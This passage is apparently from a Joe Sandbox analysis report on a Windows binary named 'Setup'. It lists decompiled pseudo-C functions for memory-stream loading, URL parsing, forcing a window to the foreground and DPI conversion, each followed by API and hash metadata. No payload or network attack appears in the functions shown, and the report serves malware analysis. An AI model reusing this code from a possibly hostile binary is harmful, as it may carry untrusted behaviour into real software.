                                                                                                                                                              						_t81 = E00415110(_v12);
                                                                                                                                                              						_t122 = _t128 + 4;
                                                                                                                                                              						_v12 =  *_t81;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t85 = E00441910(_v12);
                                                                                                                                                              						_t122 = _t127 + 4;
                                                                                                                                                              						_v12 =  *_t85;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t57 = E0043F400(_v24);
                                                                                                                                                              				_t124 = _t123 + 4;
                                                                                                                                                              				__eflags =  *_t57;
                                                                                                                                                              				if( *_t57 == 0) {
                                                                                                                                                              					_t59 = E00415110(_v24);
                                                                                                                                                              					_t124 = _t124 + 4;
                                                                                                                                                              					_v32 =  *_t59;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v32 =  *((intOrPtr*)(E0041D410(_v28)));
                                                                                                                                                              				}
                                                                                                                                                              				_v12 = _v32;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t61 = E0043F400(_v12);
                                                                                                                                                              					_t125 = _t124 + 4;
                                                                                                                                                              					__eflags =  *_t61;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t67 = E00436060(__eflags, _v12);
                                                                                                                                                              					_t126 = _t125 + 4;
                                                                                                                                                              					_t69 = E00420AA0(_v28, _a8, _t67);
                                                                                                                                                              					__eflags = _t69 & 0x000000ff;
                                                                                                                                                              					if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                              						_t70 = E00441910(_v12);
                                                                                                                                                              						_t124 = _t126 + 4;
                                                                                                                                                              						_v12 =  *_t70;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v24 = _v12;
                                                                                                                                                              						_t73 = E00415110(_v12);
                                                                                                                                                              						_t124 = _t126 + 4;
                                                                                                                                                              						_v12 =  *_t73;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				E00445360( &_v8, _v16);
                                                                                                                                                              				E00445360( &_v20, _v24);
                                                                                                                                                              				E0042BAC0(_a4,  &_v8,  &_v20);
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initstd::_$AllocatorDebugHandleHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1086691941-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                              			E004CC8C0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				void* _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr* _v60;
                                                                                                                                                              				signed int _t60;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                              				signed int _t117;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5118d6);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t60 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t60 ^ _t117);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_t63 = E00414C90();
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(_a12 != 0) {
                                                                                                                                                              					if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                              						_push(L" LoadMemory mem == NULL ");
                                                                                                                                                              						E004CC5C0(_t63);
                                                                                                                                                              						_v44 = 0x80070057;
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E0040D320();
                                                                                                                                                              						_t66 = _v44;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v28 = GlobalAlloc(0x40, _a8 + 2);
                                                                                                                                                              						if(_v28 != 0) {
                                                                                                                                                              							_t71 = E0044FCB0(__ebx, __edi, __esi, _v28, _a4, _a8);
                                                                                                                                                              							__imp__CreateStreamOnHGlobal(_v28, 1,  &_v24);
                                                                                                                                                              							_v20 = _t71;
                                                                                                                                                              							if(_v20 != 0) {
                                                                                                                                                              								L14:
                                                                                                                                                              								_v56 = 0x80004005;
                                                                                                                                                              								_v8 = 0xffffffff;
                                                                                                                                                              								E0040D320();
                                                                                                                                                              								_t66 = _v56;
                                                                                                                                                              							} else {
                                                                                                                                                              								E004300C0(_a12);
                                                                                                                                                              								_v8 = 1;
                                                                                                                                                              								if(E0041D530( &_v32) == 0) {
                                                                                                                                                              									L13:
                                                                                                                                                              									_v8 = 0;
                                                                                                                                                              									E00439240();
                                                                                                                                                              									goto L14;
                                                                                                                                                              								} else {
                                                                                                                                                              									E00430540( &_v36);
                                                                                                                                                              									if(_v36 == 0) {
                                                                                                                                                              										goto L13;
                                                                                                                                                              									} else {
                                                                                                                                                              										E0042FC90(_v36, E0041D530( &_v24));
                                                                                                                                                              										_v60 = E0041D530( &_v32);
                                                                                                                                                              										_t105 = _v60;
                                                                                                                                                              										_v20 =  *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x14))))(_v60, 0, _v36, 0, 0);
                                                                                                                                                              										if(_v20 != 0) {
                                                                                                                                                              											E004CC870(_t105, 1);
                                                                                                                                                              										}
                                                                                                                                                              										_v52 = _v20;
                                                                                                                                                              										_v8 = 0;
                                                                                                                                                              										E00439240();
                                                                                                                                                              										_v8 = 0xffffffff;
                                                                                                                                                              										E0040D320();
                                                                                                                                                              										_t66 = _v52;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							_v48 = 0x8007000e;
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E0040D320();
                                                                                                                                                              							_t66 = _v48;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_push(L" LoadMemory pDoc == NULL ");
                                                                                                                                                              					E004CC5C0(_t63);
                                                                                                                                                              					_v40 = 0x80070057;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E0040D320();
                                                                                                                                                              					_t66 = _v40;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _t66;
                                                                                                                                                              			}






















                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LoadMemory mem == NULL $ LoadMemory pDoc == NULL $W$W
                                                                                                                                                              • API String ID: 0-61333738
                                                                                                                                                              • Opcode ID: c53eb319cef488d302be499bfc4f72b57fc6207859f3b9e799a0f7a65bd0a51b
                                                                                                                                                              • Instruction ID: f45d82c9f8a196cfc6aee97ef8979deb832657bc0edcf5a1b66d4082df4fedcc
                                                                                                                                                              • Opcode Fuzzy Hash: c53eb319cef488d302be499bfc4f72b57fc6207859f3b9e799a0f7a65bd0a51b
                                                                                                                                                              • Instruction Fuzzy Hash: CA514CB5D00209EBCB04DFA5D985FEEB770FB18314F20421EE415672D0E7795A45CB99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                              			E00424F20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, WCHAR* _a4) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				char _v53;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                              				intOrPtr _v76;
                                                                                                                                                              				intOrPtr _v80;
                                                                                                                                                              				intOrPtr _v84;
                                                                                                                                                              				intOrPtr _v88;
                                                                                                                                                              				short _v92;
                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                              				intOrPtr _v108;
                                                                                                                                                              				intOrPtr _v112;
                                                                                                                                                              				void* _v116;
                                                                                                                                                              				char _v117;
                                                                                                                                                              				char _v152;
                                                                                                                                                              				char _v153;
                                                                                                                                                              				char _v154;
                                                                                                                                                              				intOrPtr _v160;
                                                                                                                                                              				signed int _t56;
                                                                                                                                                              				signed int _t57;
                                                                                                                                                              				signed int _t69;
                                                                                                                                                              				void* _t83;
                                                                                                                                                              				void* _t112;
                                                                                                                                                              				void* _t113;
                                                                                                                                                              				signed int _t114;
                                                                                                                                                              
                                                                                                                                                              				_t113 = __esi;
                                                                                                                                                              				_t112 = __edi;
                                                                                                                                                              				_t83 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5178d3);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t56 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t57 = _t56 ^ _t114;
                                                                                                                                                              				_v20 = _t57;
                                                                                                                                                              				_push(_t57);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v160 = __ecx;
                                                                                                                                                              				E004175C0(E00434050( &_v117));
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(StrStrW(_a4, L"://") == 0) {
                                                                                                                                                              					E00417910(L"http://", E00434050( &_v153));
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					E004181D0( &_v52,  &_v152);
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					E004130D0( &_v48, _a4);
                                                                                                                                                              					_a4 = E00416A30( &_v48);
                                                                                                                                                              				}
                                                                                                                                                              				E00451D90(_t112,  &_v116, 0, 0x3c);
                                                                                                                                                              				_v116 = 0x3c;
                                                                                                                                                              				_v112 = _v160;
                                                                                                                                                              				_v108 = 0x104;
                                                                                                                                                              				_v100 = _v160 + 0x20c;
                                                                                                                                                              				_v96 = 0x104;
                                                                                                                                                              				_v88 = _v160 + 0x416;
                                                                                                                                                              				_v84 = 0x104;
                                                                                                                                                              				_v80 = _v160 + 0x61e;
                                                                                                                                                              				_v76 = 0x104;
                                                                                                                                                              				_v72 = _v160 + 0x826;
                                                                                                                                                              				_v68 = 0x104;
                                                                                                                                                              				_v64 = _v160 + 0xa2e;
                                                                                                                                                              				_v60 = 0x104;
                                                                                                                                                              				_t69 = InternetCrackUrlW(_a4, 0, 0,  &_v116);
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				_v53 =  ~( ~_t69);
                                                                                                                                                              				 *((intOrPtr*)(_v160 + 0x208)) = _v104;
                                                                                                                                                              				 *((short*)(_v160 + 0x414)) = _v92;
                                                                                                                                                              				_v154 = _v53;
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_v154, _t83, _v20 ^ _t114, _v160, _t112, _t113);
                                                                                                                                                              			}


                                                                                                                                                              APIs
                                                                                                                                                              • StrStrW.SHLWAPI(?,://,00000000,DDD124F9), ref: 00424F72
                                                                                                                                                              • _memset.LIBCMT ref: 00424FD9
                                                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000003C), ref: 00425070
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CrackInternet_memset
                                                                                                                                                              • String ID: ://$<$http://
                                                                                                                                                              • API String ID: 1413715105-1638580327
                                                                                                                                                              • Opcode ID: 7eb09c8ba5adb2dde5fc887474305d75aa1904fd446edd5ed28df2af248bafcd
                                                                                                                                                              • Instruction ID: f39e0366ce6a2fa3048447456540e6740b4b34e659bafcac72065bd2d148b5cb
                                                                                                                                                              • Opcode Fuzzy Hash: 7eb09c8ba5adb2dde5fc887474305d75aa1904fd446edd5ed28df2af248bafcd
                                                                                                                                                              • Instruction Fuzzy Hash: 765149B4D14258DBEB14DFA4DC81BDDBBB4EF14304F1081AEE509AB282DB746A88CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E004965D0(struct HWND__* _a4, intOrPtr _a8, struct HWND__* _a12) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				long _v28;
                                                                                                                                                              				struct HWND__* _v32;
                                                                                                                                                              				int _v36;
                                                                                                                                                              				long _v40;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              				int _t43;
                                                                                                                                                              				signed int _t72;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50ad5c);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t39 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t39 ^ _t72);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t73 - 0x1c;
                                                                                                                                                              				_v24 = 0xffffffff;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v40 = 0;
                                                                                                                                                              				_v28 = 0;
                                                                                                                                                              				_v36 = 0;
                                                                                                                                                              				_v32 = 0;
                                                                                                                                                              				if(_a12 == 0) {
                                                                                                                                                              					_v32 = GetForegroundWindow();
                                                                                                                                                              					if(_v32 != 0 || _a8 == 0) {
                                                                                                                                                              						L5:
                                                                                                                                                              						if(_v32 == _a4 || _a4 == 0) {
                                                                                                                                                              							_t43 = 1;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v40 = GetCurrentThreadId();
                                                                                                                                                              							_v28 = GetWindowThreadProcessId(_v32, 0);
                                                                                                                                                              							if(_v40 != _v28 && _v28 != 0) {
                                                                                                                                                              								_v36 = AttachThreadInput(_v40, _v28, 1);
                                                                                                                                                              							}
                                                                                                                                                              							E00494C50(0);
                                                                                                                                                              							_v36 = SetForegroundWindow(_a4);
                                                                                                                                                              							SetFocus(_a4);
                                                                                                                                                              							if(_v40 != _v28 && _v28 != 0) {
                                                                                                                                                              								AttachThreadInput(_v40, _v28, 0);
                                                                                                                                                              							}
                                                                                                                                                              							_t43 = _v36;
                                                                                                                                                              						}
                                                                                                                                                              						goto L15;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t43 = E00496300(_a4);
                                                                                                                                                              						L15:
                                                                                                                                                              						 *[fs:0x0] = _v16;
                                                                                                                                                              						return _t43;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_v32 = _a12;
                                                                                                                                                              				goto L5;
                                                                                                                                                              			}



                                                                                                                                                              APIs
                                                                                                                                                              • GetForegroundWindow.USER32(DDD124F9), ref: 00496634
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00496672
                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00496681
                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004966A2
                                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 004966B9
                                                                                                                                                              • SetFocus.USER32(00000000), ref: 004966C6
                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004966E4
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Thread$Window$AttachForegroundInput$CurrentFocusProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3932288733-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E00426E60(void* __eflags, char _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t25;
                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                              				signed int _t62;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x516ce0);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t41);
                                                                                                                                                              				_t25 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t25 ^ _t62);
                                                                                                                                                              				_t1 =  &_v16; // 0x4267e3
                                                                                                                                                              				 *[fs:0x0] = _t1;
                                                                                                                                                              				_v20 = _t63 - 0xc;
                                                                                                                                                              				_v32 = _t41;
                                                                                                                                                              				_v28 = E00420BA0(_v32, 1);
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E0041EB00(_v32 + 1, E00415110(_v28),  &_a4);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_t13 =  &_a8; // 0x4267e3
                                                                                                                                                              				E0041EB00(_v32 + 1, E0042AE30(_v28), _t13);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				E0041B050(_v32 + 2, E00441910(_v28), _a12);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				_t23 =  &_v16; // 0x4267e3
                                                                                                                                                              				 *[fs:0x0] =  *_t23;
                                                                                                                                                              				return _v28;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID: gB$gB
                                                                                                                                                              • API String ID: 3447690668-476456316
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 25%
                                                                                                                                                              			E0040D4C0(int* _a4, intOrPtr* _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				struct HDC__* _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				int _t37;
                                                                                                                                                              
                                                                                                                                                              				do {
                                                                                                                                                              					_v20 = 0 | _a4 != 0x00000000;
                                                                                                                                                              					if(_v20 == 0) {
                                                                                                                                                              						E00417470(0x80004003);
                                                                                                                                                              					}
                                                                                                                                                              				} while (0 != 0);
                                                                                                                                                              				do {
                                                                                                                                                              					_v24 = 0 | _a8 != 0x00000000;
                                                                                                                                                              					if(_v24 == 0) {
                                                                                                                                                              						E00417470(0x80004003);
                                                                                                                                                              					}
                                                                                                                                                              				} while (0 != 0);
                                                                                                                                                              				_v12 = GetDC(0);
                                                                                                                                                              				do {
                                                                                                                                                              				} while (0 != 0 || 0 != 0);
                                                                                                                                                              				_v16 = GetDeviceCaps(_v12, 0x58);
                                                                                                                                                              				_v8 = GetDeviceCaps(_v12, 0x5a);
                                                                                                                                                              				ReleaseDC(0, _v12);
                                                                                                                                                              				 *_a8 = MulDiv(0x9ec,  *_a4, _v16);
                                                                                                                                                              				_t37 = MulDiv(0x9ec, _a4[1], _v8);
                                                                                                                                                              				 *(_a8 + 4) = _t37;
                                                                                                                                                              				return _t37;
                                                                                                                                                              			}










                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 0040D508
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040D51F
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040D52E
                                                                                                                                                              • ReleaseDC.USER32 ref: 0040D53D
                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0040D552
                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0040D56D
                                                                                                                                                                • Part of subcall function 00417470: __CxxThrowException@8.LIBCMT ref: 00417490
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsDevice$Exception@8ReleaseThrow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3795711691-0
                                                                                                                                                              • Opcode ID: 474e44d81c33a4c3ad8fcca12360042be9d1a82ca7a81d2fb1257039810e5e3e
                                                                                                                                                              • Instruction ID: a675958bb8746e427a2099b888aedb08fd49cc9464bf76652de926079c8ca548
                                                                                                                                                              • Opcode Fuzzy Hash: 474e44d81c33a4c3ad8fcca12360042be9d1a82ca7a81d2fb1257039810e5e3e
                                                                                                                                                              • Instruction Fuzzy Hash: 99213E75A00208EFEB40DFA0CC49BAEBBB5FB58305F10C169ED15A7290E7749A45DB51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 25%
                                                                                                                                                              			E0040D580(int* _a4, intOrPtr* _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				struct HDC__* _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				int _t37;
                                                                                                                                                              
                                                                                                                                                              				do {
                                                                                                                                                              					_v20 = 0 | _a4 != 0x00000000;
                                                                                                                                                              					if(_v20 == 0) {
                                                                                                                                                              						E00417470(0x80004003);
                                                                                                                                                              					}
                                                                                                                                                              				} while (0 != 0);
                                                                                                                                                              				do {
                                                                                                                                                              					_v24 = 0 | _a8 != 0x00000000;
                                                                                                                                                              					if(_v24 == 0) {
                                                                                                                                                              						E00417470(0x80004003);
                                                                                                                                                              					}
                                                                                                                                                              				} while (0 != 0);
                                                                                                                                                              				_v12 = GetDC(0);
                                                                                                                                                              				do {
                                                                                                                                                              				} while (0 != 0 || 0 != 0);
                                                                                                                                                              				_v16 = GetDeviceCaps(_v12, 0x58);
                                                                                                                                                              				_v8 = GetDeviceCaps(_v12, 0x5a);
                                                                                                                                                              				ReleaseDC(0, _v12);
                                                                                                                                                              				 *_a8 = MulDiv(_v16,  *_a4, 0x9ec);
                                                                                                                                                              				_t37 = MulDiv(_v8, _a4[1], 0x9ec);
                                                                                                                                                              				 *(_a8 + 4) = _t37;
                                                                                                                                                              				return _t37;
                                                                                                                                                              			}










                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 0040D5C8
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040D5DF
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040D5EE
                                                                                                                                                              • ReleaseDC.USER32 ref: 0040D5FD
                                                                                                                                                              • MulDiv.KERNEL32(00000000,?,000009EC), ref: 0040D612
                                                                                                                                                              • MulDiv.KERNEL32(?,?,000009EC), ref: 0040D62D
                                                                                                                                                                • Part of subcall function 00417470: __CxxThrowException@8.LIBCMT ref: 00417490
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsDevice$Exception@8ReleaseThrow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3795711691-0
                                                                                                                                                              • Opcode ID: 926a56defdbf55e2c9f6654e5b0a3c07791f1a973d1cb76345805afdf9828b57
                                                                                                                                                              • Instruction ID: 7a998df5e12f5b6324f2c60fdb4a6c7c9e544ff4a4d7dd48a3ffa3a8284a9534
                                                                                                                                                              • Opcode Fuzzy Hash: 926a56defdbf55e2c9f6654e5b0a3c07791f1a973d1cb76345805afdf9828b57
                                                                                                                                                              • Instruction Fuzzy Hash: 2A213BB5A00209EFEB04DFA0CC45BAEBBB5FB58305F00C569FD15A7280DB788A45DB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E004F0440(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                              				signed int _t53;
                                                                                                                                                              				intOrPtr _t62;
                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                              				signed short* _t70;
                                                                                                                                                              				intOrPtr _t81;
                                                                                                                                                              				void* _t82;
                                                                                                                                                              				void* _t123;
                                                                                                                                                              				void* _t124;
                                                                                                                                                              				signed int _t125;
                                                                                                                                                              				void* _t126;
                                                                                                                                                              				void* _t127;
                                                                                                                                                              
